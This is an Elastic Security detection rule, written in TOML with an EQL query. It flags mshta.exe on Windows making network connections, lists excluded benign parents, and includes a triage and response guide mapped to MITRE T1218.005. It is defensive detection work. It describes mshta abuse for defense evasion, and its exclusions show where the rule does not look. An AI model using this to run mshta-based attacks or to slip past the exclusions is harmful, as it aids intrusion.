Mshta Making Network Connections

  1[metadata]
  2creation_date = "2020/09/02"
  3integration = ["endpoint", "windows"]
  4maturity = "production"
  5updated_date = "2025/01/15"
  6min_stack_version = "8.14.0"
  7min_stack_comments = "Breaking change at 8.14.0 for the Windows Integration."
  8
  9[rule]
 10author = ["Elastic"]
 11description = """
 12Identifies Mshta.exe making outbound network connections. This may indicate adversarial activity, as Mshta is often
 13leveraged by adversaries to execute malicious scripts and evade detection.
 14"""
 15from = "now-20m"
 16index = [
 17    "logs-endpoint.events.process-*",
 18    "logs-endpoint.events.network-*",
 19    "winlogbeat-*",
 20    "logs-windows.sysmon_operational-*",
 21]
 22language = "eql"
 23license = "Elastic License v2"
 24name = "Mshta Making Network Connections"
 25references = [
 26    "https://www.elastic.co/security-labs/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper",
 27]
 28risk_score = 47
 29rule_id = "c2d90150-0133-451c-a783-533e736c12d7"
 30severity = "medium"
 31tags = [
 32    "Domain: Endpoint",
 33    "OS: Windows",
 34    "Use Case: Threat Detection",
 35    "Tactic: Defense Evasion",
 36    "Data Source: Elastic Defend",
 37    "Data Source: Sysmon",
 38    "Resources: Investigation Guide",
 39]
 40type = "eql"
 41
 42query = '''
 43sequence by process.entity_id with maxspan=10m
 44  [process where host.os.type == "windows" and event.type == "start" and process.name : "mshta.exe" and
 45     not process.parent.name : "Microsoft.ConfigurationManagement.exe" and
 46     not (process.parent.executable : "C:\\Amazon\\Amazon Assistant\\amazonAssistantService.exe" or
 47          process.parent.executable : "C:\\TeamViewer\\TeamViewer.exe") and
 48     not process.args : "ADSelfService_Enroll.hta"]
 49  [network where host.os.type == "windows" and process.name : "mshta.exe"]
 50'''
 51note = """## Triage and analysis
 52
 53> **Disclaimer**:
 54> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
 55
 56### Investigating Mshta Making Network Connections
 57
 58Mshta.exe is a legitimate Windows utility used to execute Microsoft HTML Application (HTA) files. Adversaries exploit it to run malicious scripts, leveraging its trusted status to bypass security measures. The detection rule identifies suspicious network activity by Mshta.exe, excluding known benign processes, to flag potential threats. This approach helps in identifying unauthorized network connections indicative of malicious intent.
 59
 60### Possible investigation steps
 61
 62- Review the process tree to understand the parent-child relationship of mshta.exe, focusing on any unusual or unexpected parent processes that are not excluded by the rule, such as Microsoft.ConfigurationManagement.exe or known benign executables.
 63- Analyze the command-line arguments used by mshta.exe to identify any suspicious or unexpected scripts being executed, especially those not matching the excluded ADSelfService_Enroll.hta.
 64- Examine the network connections initiated by mshta.exe, including destination IP addresses, domains, and ports, to identify any connections to known malicious or suspicious endpoints.
 65- Check for any related alerts or logs from the same host around the time of the mshta.exe activity to identify potential lateral movement or additional malicious behavior.
 66- Investigate the user account associated with the mshta.exe process to determine if it has been compromised or is exhibiting unusual activity patterns.
 67
 68### False positive analysis
 69
 70- Mshta.exe may be triggered by legitimate software updates or installations, such as those from Microsoft Configuration Management. To handle this, add exceptions for processes with parent names like Microsoft.ConfigurationManagement.exe.
 71- Certain applications like Amazon Assistant and TeamViewer may use Mshta.exe for legitimate purposes. Exclude these by specifying their executable paths, such as C:\\Amazon\\Amazon Assistant\\amazonAssistantService.exe and C:\\TeamViewer\\TeamViewer.exe.
 72- Custom scripts or internal tools that utilize HTA files for automation might cause false positives. Identify these scripts and exclude them by their specific arguments, such as ADSelfService_Enroll.hta.
 73- Regularly review and update the list of exceptions to ensure that only verified benign activities are excluded, minimizing the risk of overlooking genuine threats.
 74
 75### Response and remediation
 76
 77- Isolate the affected system from the network to prevent further unauthorized access or data exfiltration.
 78- Terminate the mshta.exe process if it is confirmed to be making unauthorized network connections.
 79- Conduct a thorough scan of the affected system using updated antivirus and anti-malware tools to identify and remove any malicious scripts or files.
 80- Review and analyze the process tree and network connections associated with mshta.exe to identify any additional compromised processes or systems.
 81- Restore the system from a known good backup if malicious activity is confirmed and cannot be fully remediated.
 82- Implement application whitelisting to prevent unauthorized execution of mshta.exe and similar system binaries.
 83- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on the broader network."""
 84
 85
 86[[rule.threat]]
 87framework = "MITRE ATT&CK"
 88[[rule.threat.technique]]
 89id = "T1218"
 90name = "System Binary Proxy Execution"
 91reference = "https://attack.mitre.org/techniques/T1218/"
 92[[rule.threat.technique.subtechnique]]
 93id = "T1218.005"
 94name = "Mshta"
 95reference = "https://attack.mitre.org/techniques/T1218/005/"
 96
 97
 98
 99[rule.threat.tactic]
100id = "TA0005"
101name = "Defense Evasion"
102reference = "https://attack.mitre.org/tactics/TA0005/"